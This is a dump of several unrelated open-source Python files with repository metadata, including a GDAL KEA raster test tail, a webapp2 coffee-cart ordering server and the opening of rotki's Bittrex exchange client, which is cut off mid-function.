rat.SetValueAsInt(0,2,0)
rat.SetValueAsDouble(0,2,0)
rat.SetValueAsString(0,2,'foo')
rat.SetValueAsString(0,3,"123")
rat.SetValueAsDouble(0,3,123)
rat.SetValueAsInt(0,3,123)
cloned_rat = rat.Clone()
if ds.GetRasterBand(1).SetDefaultRAT( rat ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
rat = out2_ds.GetRasterBand(1).GetDefaultRAT()
for i in range(7):
if rat.GetColOfUsage(rat.GetUsageOfCol(i)) != i:
gdaltest.post_reason('fail')
print(i)
print(rat.GetColOfUsage(rat.GetUsageOfCol(i)))
return 'fail'
if cloned_rat.GetNameOfCol(0) != 'col_real_generic':
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(0) != gdal.GFT_Real:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetUsageOfCol(0) != gdal.GFU_Generic:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetUsageOfCol(1) != gdal.GFU_PixelCount:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(2) != gdal.GFT_String:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(3) != gdal.GFT_Integer:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetColumnCount() != cloned_rat.GetColumnCount():
gdaltest.post_reason('fail')
return 'fail'
if rat.GetRowCount() != cloned_rat.GetRowCount():
gdaltest.post_reason('fail')
return 'fail'
for i in range(rat.GetColumnCount()):
if rat.GetNameOfCol(i) != cloned_rat.GetNameOfCol(i):
gdaltest.post_reason('fail')
return 'fail'
if rat.GetTypeOfCol(i) != cloned_rat.GetTypeOfCol(i):
gdaltest.post_reason('fail')
return 'fail'
if rat.GetUsageOfCol(i) != cloned_rat.GetUsageOfCol(i):
gdaltest.post_reason('fail')
print(i)
print(rat.GetUsageOfCol(i))
print(cloned_rat.GetUsageOfCol(i))
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
rat.GetNameOfCol(-1)
rat.GetTypeOfCol(-1)
rat.GetUsageOfCol(-1)
rat.GetNameOfCol(rat.GetColumnCount())
rat.GetTypeOfCol(rat.GetColumnCount())
rat.GetUsageOfCol(rat.GetColumnCount())
rat.GetValueAsDouble( -1, 0 )
rat.GetValueAsInt( -1, 0 )
rat.GetValueAsString( -1, 0 )
rat.GetValueAsDouble( rat.GetColumnCount(), 0 )
rat.GetValueAsInt( rat.GetColumnCount(), 0 )
rat.GetValueAsString( rat.GetColumnCount(), 0 )
rat.GetValueAsDouble( 0, -1 )
rat.GetValueAsInt( 0, -1 )
rat.GetValueAsString( 0, -1 )
rat.GetValueAsDouble( 0, rat.GetRowCount() )
rat.GetValueAsInt( 0, rat.GetRowCount() )
rat.GetValueAsString( 0, rat.GetRowCount() )
gdal.PopErrorHandler()
if rat.GetValueAsDouble( 0, 0 ) != 1.23:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsInt( 0, 0 ) != 1:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 0 ) != '1.23':
gdaltest.post_reason('fail')
print(rat.GetValueAsString( 0, 0 ))
return 'fail'
if rat.GetValueAsInt( 0, 3 ) != 123:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsDouble( 0, 3 ) != 123:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 3 ) != '123':
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 2 ) != 'foo':
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsInt( 0, 2 ) != 0:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsDouble( 0, 2 ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test overviews
def kea_13():
if gdaltest.kea_driver is None:
return 'skip'
src_ds = gdal.Open('data/byte.tif')
ds = gdaltest.kea_driver.CreateCopy("tmp/out.kea", src_ds)
src_ds = None
ds.BuildOverviews('NEAR', [2])
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds) # yes CreateCopy() of KEA copies overviews
if out2_ds.GetRasterBand(1).GetOverviewCount() != 1:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).Checksum() != 1087:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).GetDefaultRAT() is not None:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).SetDefaultRAT(None) == 0:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(-1) is not None:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(1) is not None:
gdaltest.post_reason('fail')
return 'fail'
out2_ds = None
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test mask bands
def kea_14():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
if ds.GetRasterBand(1).GetMaskFlags() != gdal.GMF_ALL_VALID:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 3:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).CreateMaskBand(0)
if ds.GetRasterBand(1).GetMaskFlags() != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 3:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).GetMaskBand().Fill(0)
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 0:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds) # yes CreateCopy() of KEA copies overviews
if out2_ds.GetRasterBand(1).GetMaskFlags() != 0:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetMaskBand().Checksum() != 0:
print(out2_ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
out2_ds = None
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
gdaltest_list = [
kea_init,
kea_1,
kea_2,
kea_3,
kea_4,
kea_5,
kea_6,
kea_7,
kea_8,
kea_9,
kea_10,
kea_11,
kea_12,
kea_13,
kea_14
]
if __name__ == '__main__':
gdaltest.setup_run( 'kea' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| [
"even.rouault@mines-paris.org"
] | even.rouault@mines-paris.org |
3e9416daec97cca67eb1ab3bda5bf27948ea697a | c720e9298891502a94a7086e7c6908d2551ff254 | /tests/__init__.py | 09c53e834481a97d3ffde68608519b5ac92e2366 | [
"MIT"
] | permissive | mckinsel/dcplib | 8d304e95dbf31927c482bd18daf4a2def6f7382b | 93f0e6c20a2e2a3ddcdfa6fe1a367ae1364fbeb5 | refs/heads/master | 2020-09-01T16:03:35.225816 | 2019-10-28T16:51:02 | 2019-10-28T16:51:02 | 219,000,310 | 0 | 0 | null | 2019-11-01T14:24:25 | 2019-11-01T14:24:25 | null | UTF-8 | Python | false | false | 932 | py | import os
class EnvironmentSetup:
"""
Set environment variables.
Provide a dict of variable names and values.
Setting a value to None will delete it from the environment.
"""
def __init__(self, env_vars_dict):
self.env_vars = env_vars_dict
self.saved_vars = {}
def enter(self):
for k, v in self.env_vars.items():
if k in os.environ:
self.saved_vars[k] = os.environ[k]
if v:
os.environ[k] = v
else:
if k in os.environ:
del os.environ[k]
def exit(self):
for k, v in self.saved_vars.items():
os.environ[k] = v
def __enter__(self):
self.enter()
def __exit__(self, type, value, traceback):
self.exit()
def fixture_file_path(filename):
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'fixtures', filename))
| [
"sam@sampierson.com"
] | sam@sampierson.com |
4c8a5ec0a1babe7f7faaccd7a56cf6452644aa9e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02783/s364760222.py | 56095ba287f4d078faedb65eb7b8df8402523e7c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import sys
#import string
#from collections import defaultdict, deque, Counter
#import bisect
#import heapq
#import math
#from itertools import accumulate
#from itertools import permutations as perm
#from itertools import combinations as comb
#from itertools import combinations_with_replacement as combr
#from fractions import gcd
#import numpy as np
stdin = sys.stdin
sys.setrecursionlimit(10 ** 7)
MIN = -10 ** 9
MOD = 10 ** 9 + 7
INF = float("inf")
IINF = 10 ** 18
def solve():
#n = int(stdin.readline().rstrip())
h,a = map(int, stdin.readline().rstrip().split())
#l = list(map(int, stdin.readline().rstrip().split()))
#numbers = [[int(c) for c in l.strip().split()] for l in sys.stdin]
#word = [stdin.readline().rstrip() for _ in range(n)]
#number = [[int(c) for c in stdin.readline().rstrip()] for _ in range(n)]
#zeros = [[0] * w for i in range(h)]
ans = h // a
if h%a == 0:
print(ans)
else:
print(ans + 1)
if __name__ == '__main__':
solve()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
8f1a6d780bd0edce2d520e13dad88a8227254da9 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v2/model/confluent_account_resource_attributes.py | 17ce380b94bbc1ddf35e1700b093ca27a39b4d1d | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 2,096 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from typing import List, Union
from datadog_api_client.model_utils import (
ModelNormal,
cached_property,
unset,
UnsetType,
)
class ConfluentAccountResourceAttributes(ModelNormal):
@cached_property
def openapi_types(_):
return {
"enable_custom_metrics": (bool,),
"id": (str,),
"resource_type": (str,),
"tags": ([str],),
}
attribute_map = {
"enable_custom_metrics": "enable_custom_metrics",
"id": "id",
"resource_type": "resource_type",
"tags": "tags",
}
def __init__(
self_,
resource_type: str,
enable_custom_metrics: Union[bool, UnsetType] = unset,
id: Union[str, UnsetType] = unset,
tags: Union[List[str], UnsetType] = unset,
**kwargs,
):
"""
Attributes object for updating a Confluent resource.
:param enable_custom_metrics: Enable the ``custom.consumer_lag_offset`` metric, which contains extra metric tags.
:type enable_custom_metrics: bool, optional
:param id: The ID associated with a Confluent resource.
:type id: str, optional
:param resource_type: The resource type of the Resource. Can be ``kafka`` , ``connector`` , ``ksql`` , or ``schema_registry``.
:type resource_type: str
:param tags: A list of strings representing tags. Can be a single key, or key-value pairs separated by a colon.
:type tags: [str], optional
"""
if enable_custom_metrics is not unset:
kwargs["enable_custom_metrics"] = enable_custom_metrics
if id is not unset:
kwargs["id"] = id
if tags is not unset:
kwargs["tags"] = tags
super().__init__(kwargs)
self_.resource_type = resource_type
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
66491e93bac49e0f9d5e1cb7578aace7fd501279 | 7694af8a805b20f2d9f435b381d8cb5e59bffa50 | /apps/landing/templatetags/cart_template_tags.py | c7596e8ad09f84ee8777f8d9a432df147b2dd23a | [] | no_license | RympeR/dindex_landing | b0e1115a7009e25072369077a6854b93f1111054 | cb422bb148a2b5793e0ba13c9525dd0fd64a6f09 | refs/heads/main | 2023-06-23T20:16:14.908847 | 2021-07-22T14:05:29 | 2021-07-22T14:05:29 | 380,458,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from django import template
register = template.Library()
@register.filter
def post_categories(value):
return 0
| [
"georg.rashkov@gmail.com"
] | georg.rashkov@gmail.com |
fe5bc6143a588be282570b8bc834be40068790f1 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnn1329.py | dd7710a727f8089d0e50e81562f7df4f484b794b | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 121 | py | ii = [('UnitAI.py', 1), ('FitzRNS3.py', 1), ('DaltJMA.py', 1), ('WheeJPT.py', 1), ('MereHHB3.py', 1), ('MereHHB2.py', 2)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
5a0d3f5f22f67c39c6323697a44bd6491d06ab42 | a5455dbb01687ab031f6347306dbb5ccc3c0c162 | /第一阶段/day13/code/mymod3.py | bb84da638d9bdc4dc9f09578b20fc403ed12fb85 | [] | no_license | zuobing1995/tiantianguoyuan | 9ff67aef6d916e27d92b63f812c96a6d5dbee6f8 | 29af861f5edf74a4a1a4156153678b226719c56d | refs/heads/master | 2022-11-22T06:50:13.818113 | 2018-11-06T04:52:53 | 2018-11-06T04:52:53 | 156,317,754 | 1 | 1 | null | 2022-11-22T01:06:37 | 2018-11-06T03:02:51 | Python | UTF-8 | Python | false | false | 156 | py | # mymod3.py
# 此模块示意模块的隐藏属性
def f1():
pass
def _f2():
pass
def __f3():
pass
name1 = "abc"
_name2 = '123'
| [
"bing@163.com"
] | bing@163.com |
106306d66014bc9ec0a7130fe2f9fb6005498a20 | e170f20ffd27afbf6ec1ef8f8d4f612618ac2d68 | /python3/koans/about_datetime.py | 1560055c47ae537856f6541e3e32d023ba741205 | [
"MIT"
] | permissive | AkrutiPoshatwar/python_training | 16818e81d151d4ae317caccbc1e2e8d03a53f980 | 258f71310ef4cc57fc0f989aa94cafdc0f53d907 | refs/heads/akruti | 2022-12-06T09:48:09.874415 | 2020-09-02T04:53:35 | 2020-09-02T04:53:35 | 289,927,962 | 0 | 0 | MIT | 2020-08-26T08:11:05 | 2020-08-24T12:55:49 | Python | UTF-8 | Python | false | false | 190 | py | from datetime import date
from datetime import timedelta
d1 = date(2020, 9, 1)
i=0
while i < 5:
day = [d1 + timedelta(days = 5)]
d1 = d1 + timedelta(days=5)
i+=1
print(day) | [
"akruti.poshatwar@noovosoft.com"
] | akruti.poshatwar@noovosoft.com |
733a86b41dc42f3b983bd0646cf83dc93a11e93f | 9a7526401349d6004a0ffb94163e75b368e064a1 | /CoffeeCartServer/main.py | b566af1d804d597083e81f53d1507102ce904538 | [] | no_license | jassimran/Coffee-Cart-App | 2ab70d3e4645be4f595b0ff923aab5f90a818616 | 0b187fa82c0cfbfa0384100d0ca2e0dd338e95c0 | refs/heads/master | 2020-03-14T02:26:37.356816 | 2018-04-28T10:27:57 | 2018-04-28T10:27:57 | 131,398,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,541 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
from webapp2 import Route
import json
import json_util
import jinja_util
import datetime
from pprint import pprint
import logging
import logging.config
from customer import Customer
from item import Item
from purchase import Purchase
from preorder import Preorder
from string import rstrip
import localdate
# read initial config file
logging.config.fileConfig('logging.conf')
log = logging.getLogger('webServer')
#########################################
######## PageHandler Functions ########
#########################################
class PageHandler(webapp2.RequestHandler):
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def renderJson(self, d):
json_txt = json.dumps(d)
self.response.headers['Content-Type'] = 'application/json; charset=UTF-8'
self.write(json_txt)
def renderStr(self, template, **params):
#params['user'] = self.user
return jinja_util.renderStr(template, **params)
def render(self, template, **kw):
self.write(self.renderStr(template, **kw))
class VIPHandler(PageHandler):
# Get VIP customer info
def get(self, uid=None):
#log.debug("Get VIP")
have_error = False
params = {}
if not uid:
self.error(404)
params['error'] = "No vip card number provided."
self.renderJson(params)
else:
self.uid = int(uid)
#make sure the user doesn't already exist
customer = Customer.byID(self.uid)
if customer:
self.renderJson(customer.asDict())
else:
self.error(404)
params['error'] = "The customer info requested could not be found."
self.renderJson(params)
# Add VIP customer
def post(self):
#log.debug("Add VIP")
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if self.checkParamsErrors(params):
params['error'] = "The information provided was incomplete or incorrect."
self.error(400)
self.renderJson(params)
else:
self.name = params['name']
self.dob = self.checkDOB(params['dob'])
self.phone = params['phone']
#make sure the user doesn't already exist
if Customer.findCustomer(self.name, self.dob, self.phone):
msg = 'That user already exists.'
error_dict = {'error': msg}
self.error(400)
self.renderJson(error_dict)
else:
customer = Customer.register(self.name, self.dob, self.phone)
self.response.set_status(201)
self.renderJson(customer.asDict())
# Edit VIP customer info
def put(self, uid=None):
#log.debug("Edit VIP")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not uid:
params['error_card_number'] = "No vip card number provided."
have_error = True
if self.checkParamsErrors(params) or have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
#make sure the user doesn't already exist
self.uid = int(uid)
customer = Customer.byID(self.uid)
if customer:
self.name = params['name']
self.dob = self.checkDOB(params['dob'])
self.phone = params['phone']
new_info_cust = Customer.findCustomer(self.name, self.dob, self.phone)
if not new_info_cust:
if customer.updateInfo(self.uid, name=self.name, dob=self.dob, phone=self.phone):
return_val = {"complete": "The vip account was successfully updated."}
self.renderJson(return_val)
else:
msg = 'The info provided matches that of an existing customer.'
error_dict = {'error': msg}
self.error(400)
self.renderJson(error_dict)
else:
msg = 'The vip card number provided does not exist.'
error_dict = {'error': msg}
self.error(404)
self.renderJson(error_dict)
# Delete VIP customer
def delete(self, uid=None):
#log.debug("Delete VIP")
have_error = False
params = {}
if not uid:
params['error'] = "No vip card number provided."
self.error(400)
self.renderJson(params)
else:
self.uid = int(uid)
customer = Customer.byID(self.uid)
if customer:
if customer.deleteCustomer(self.uid):
return_val = {"complete": "The vip account given was successfully deleted."}
self.response.set_status(204)
self.renderJson(return_val)
else:
error_dict = {'error': 'The vip card number provided does not exist.'}
self.error(404)
self.renderJson(error_dict)
def checkParamsErrors(self, params):
have_error = False
if not 'name' in params.keys() or params['name'] == "":
params['error_name'] = "No name provided."
have_error = True
if not 'dob' in params.keys() or params['dob'] == "":
params['error_dob'] = "No date of birth provided."
have_error = True
elif not self.checkDOB(params['dob']):
params['error_dob'] = "Invalid date of birth provided."
have_error = True
if not 'phone' in params.keys() or params['phone'] == "":
params['error_phone'] = "No phone number provided."
have_error = True
return have_error
def checkDOB(self, inputDOB):
split = inputDOB.split('-')
today = localdate.getToday('est')
if len(split) != 3:
return None
# Check Month
if int(split[1]) > 12 or int(split[1]) < 1:
return None
# Check Day
if int(split[2]) > 31 or int(split[2]) < 1:
return None
#Check Year
if int(split[0]) < 1900:
return None
try:
dob_date = datetime.datetime.strptime(inputDOB, "%Y-%m-%d").date()
if(today >= dob_date):
return inputDOB
except ValueError:
return None
class PurchaseHandler(PageHandler):
def post(self):
#log.debug("PurchaseHandler")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'card_number' in params.keys():
params['error_card_number'] = "No vip card number provided."
have_error = True
else:
self.customer = Customer.byID(params["card_number"])
if not self.customer:
params['error_card_number'] = "The vip card number provided does not exist."
have_error = True
self.order_list = []
if not 'item_list' in params.keys() or len(params['item_list']) == 0:
params['error_items'] = "No list of items was provided."
have_error = True
else:
error_items = "Invalid item ID provided:"
have_item_error = False
for itemID in params['item_list']:
item = Item.byID(itemID)
if not item:
error_items = error_items + " " + str(itemID) + ","
have_item_error = True
else:
self.order_list.append(item)
if have_item_error:
params['error_items'] = rstrip(error_items, ',')
have_error = True
if not 'cart_number' in params.keys():
params['error_cart_num'] = "The cart number where this order was placed was not provided."
have_error = True
if have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
purcahse = Purchase.newPurchase(self.customer, self.order_list, params["cart_number"])
if purcahse:
result = {"complete": "Order successfully added.", "purchase": purcahse.asDict()}
self.renderJson(result)
else:
params['error'] = "There was an error while completing the order."
self.error(400)
self.renderJson(params)
class PreOrderHandler(PageHandler):
def post(self):
#log.debug("PreOrderHandler")
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'card_number' in params.keys():
params['error_card_number'] = "No vip card number provided."
have_error = True
else:
customer = Customer.byID(params["card_number"])
if not customer:
params['error_card_number'] = "The vip card number provided does not exist."
have_error = True
if not 'item_list' in params.keys() or len(params['item_list']) == 0:
params['error_items'] = "No list of items preordered was provided."
have_error = True
else:
error_items = "Invalid item ID provided:"
have_item_error = False
for itemID in params['item_list']:
if not Item.byID(itemID):
error_items = error_items + " " + str(itemID) + ","
have_item_error = True
if have_item_error:
params['error_items'] = rstrip(error_items, ',')
have_error = True
if not 'cart_number' in params.keys():
params['error_cart_num'] = "The cart number where the preorder was placed was not provided."
have_error = True
if not 'preorder_date' in params.keys():
params['error_preorder_date'] = "The fulfillment date for the preorder was not provided."
have_error = True
else:
self.pre_order_date = self.checkPreorderDate(params["preorder_date"])
if not self.pre_order_date:
params['error_preorder_date'] = "The fulfillment date provided for the preorder was not valid."
have_error = True
if have_error:
params['error'] = "The information provided was incomplete."
self.error(400)
self.renderJson(params)
else:
result = Preorder.newPreorder(params['card_number'], self.pre_order_date, params['item_list'], params["cart_number"])
if isinstance(result, bool):
result = {"complete": "Preorder successfully added."}
self.renderJson(result)
else:
params['error'] = "There was an error while completing the preorder."
params['error_items'] = result
self.error(400)
self.renderJson(params)
def checkPreorderDate(self, date):
split = date.split('-')
today = localdate.getToday('est')
if len(split) != 3:
return None
# Check Month
if int(split[1]) > 12 or int(split[1]) < 1:
return None
# Check Day
if int(split[2]) > 31 or int(split[2]) < 1:
return None
#Check Year
if int(split[0]) < 1900:
return None
try:
order_date = datetime.datetime.strptime(date, "%Y-%m-%d").date()
next_month = today + datetime.timedelta(31)
if(today < order_date) and (order_date < next_month):
return order_date
except ValueError:
return None
class DailyPurchaseReportHandler(PageHandler):
def get(self, cart_number=None):
result = {}
if cart_number is not None:
cart_number = int(cart_number)
result = { 'purchases': Purchase.todaysPurchases(cart_number) }
else:
result = { 'purchases': Purchase.todaysPurchases() }
self.renderJson(result)
class DailyPreOrderReportHandler(PageHandler):
def get(self, cart_number=None):
result = {}
if cart_number is not None:
cart_number = int(cart_number)
result = { 'preorders': Preorder.todaysPreorders(cart_number) }
else:
result = { 'preorders': Preorder.todaysPreorders() }
self.renderJson(result)
class GetInventoryHandler(PageHandler):
def get(self):
item_list = Item.getInventory()
self.renderJson(item_list)
class EditInventoryHandler(PageHandler):
def get(self):
self.write("Stuff")
def post(self):
log.debug("EditDessertsHandler")
self.done()
def done(self):
result = {"complete": "Action complete"}
self.renderJson(result)
class AddInventoryHandler(PageHandler):
def post(self):
have_error = False
params = {}
try:
params = json_util.decodeDict(json.loads(self.request.body))
pprint(params)
except ValueError:
self.error(400)
self.renderJson({'error': "The information provided was incomplete."})
if not 'price' in params.keys():
params['error_price'] = "No price was provided."
have_error = True
if not 'type' in params.keys():
params['error_type'] = "No type was provided."
have_error = True
if not 'best_seller' in params.keys():
params['error_best_seller'] = "best_seller was not provided."
have_error = True
if not 'is_drink' in params.keys():
params['is_drink'] = False
item_data = [params['price'], params['type'], params['best_seller'], params['is_drink']]
added_item = Item.newItem(*item_data)
self.write("Done")
app = webapp2.WSGIApplication([
('/vip/', VIPHandler),
Route('/vip/<uid:[0-9]+>', handler=VIPHandler),
('/purchase/', PurchaseHandler),
('/preorder/', PreOrderHandler),
('/dailypurchase.json', DailyPurchaseReportHandler),
('/dailypurchase/', DailyPurchaseReportHandler),
Route('/dailypurchase/<cart_number:[0-9]+>', handler=DailyPurchaseReportHandler),
('/dailypreorder.json', DailyPreOrderReportHandler),
('/dailypreorder/', DailyPreOrderReportHandler),
Route('/dailypreorder/<cart_number:[0-9]+>', handler=DailyPreOrderReportHandler),
('/getinventory.json', GetInventoryHandler),
('/editinventory.html', EditInventoryHandler),
('/addTestInventory', AddInventoryHandler),
], debug=True)
def addTestItems():
#Populate the item database with some test cases
#Item(price, itemType, bestSeller, isDrink=False)
new_items = [ [2.00, "Coffee", False, True],
[2.00, "Coffee - Refill", False, True],
[3.00, "Chocolate Chip Cookie", False],
[4.50, "German Chocolate Cake", True],
[1.50, "Biscotti", False],
]
for item in new_items:
i = Item.newItem(*item)
def main():
# Set the logging level in the main function
# See the section on Requests and App Caching for information on how
# App Engine reuses your request handlers when you specify a main function
logging.getLogger().setLevel(logging.DEBUG)
webapp.util.run_wsgi_app(application)
if __name__ == '__main__':
main()
| [
"just.simmi@gmail.com"
] | just.simmi@gmail.com |
ee413656c69701681e6825f68e0cd9d3ab01a601 | 5f885e38973c4eddd6f086cbc7463de56fe1edab | /rotkehlchen/exchanges/bittrex.py | 1f4f76b8e4842a5a53cce1dfab102cd03bd98952 | [
"BSD-3-Clause"
] | permissive | hjorthjort/rotki | 8922372e2f1ce5bf5fab3a68f0362b50a952af81 | 5bd4cdf0c756873b41999ced6d5fd7383fb75963 | refs/heads/master | 2021-03-24T00:14:56.421344 | 2020-03-10T12:26:16 | 2020-03-10T13:43:15 | 247,496,415 | 0 | 0 | BSD-3-Clause | 2020-03-15T15:39:52 | 2020-03-15T15:39:52 | null | UTF-8 | Python | false | false | 15,927 | py | import hashlib
import hmac
import logging
import time
from json.decoder import JSONDecodeError
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union, overload
from urllib.parse import urlencode
from typing_extensions import Literal
from rotkehlchen.assets.asset import Asset
from rotkehlchen.assets.converters import asset_from_bittrex
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.errors import (
DeserializationError,
RemoteError,
UnknownAsset,
UnprocessableTradePair,
UnsupportedAsset,
)
from rotkehlchen.exchanges.data_structures import (
AssetMovement,
Trade,
get_pair_position_asset,
trade_pair_from_assets,
)
from rotkehlchen.exchanges.exchange import ExchangeInterface
from rotkehlchen.fval import FVal
from rotkehlchen.inquirer import Inquirer
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_asset_amount,
deserialize_fee,
deserialize_price,
deserialize_timestamp_from_bittrex_date,
deserialize_trade_type,
get_pair_position_str,
pair_get_assets,
)
from rotkehlchen.typing import (
ApiKey,
ApiSecret,
AssetMovementCategory,
Fee,
Location,
Timestamp,
TradePair,
)
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.interfaces import cache_response_timewise, protect_with_lock
from rotkehlchen.utils.serialization import rlk_jsonloads_dict
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
BITTREX_MARKET_METHODS = {
'getopenorders',
'cancel',
'sellmarket',
'selllimit',
'buymarket',
'buylimit',
}
BITTREX_ACCOUNT_METHODS = {
'getbalances',
'getbalance',
'getdepositaddress',
'withdraw',
'getorderhistory',
'getdeposithistory',
'getwithdrawalhistory',
}
BittrexListReturnMethod = Literal[
'getcurrencies',
'getorderhistory',
'getbalances',
'getdeposithistory',
'getwithdrawalhistory',
]
def bittrex_pair_to_world(given_pair: str) -> TradePair:
"""
Turns a pair written in the bittrex way to Rotkehlchen way
Throws:
- UnsupportedAsset due to asset_from_bittrex()
- UnprocessableTradePair if the pair can't be split into its parts
"""
if not isinstance(given_pair, str):
raise DeserializationError(
f'Could not deserialize bittrex trade pair. Expected a string '
f'but found {type(given_pair)}',
)
pair = TradePair(given_pair.replace('-', '_'))
base_currency = asset_from_bittrex(get_pair_position_str(pair, 'first'))
quote_currency = asset_from_bittrex(get_pair_position_str(pair, 'second'))
# Since in Bittrex the base currency is the cost currency, iow in Bittrex
# for BTC_ETH we buy ETH with BTC and sell ETH for BTC, we need to turn it
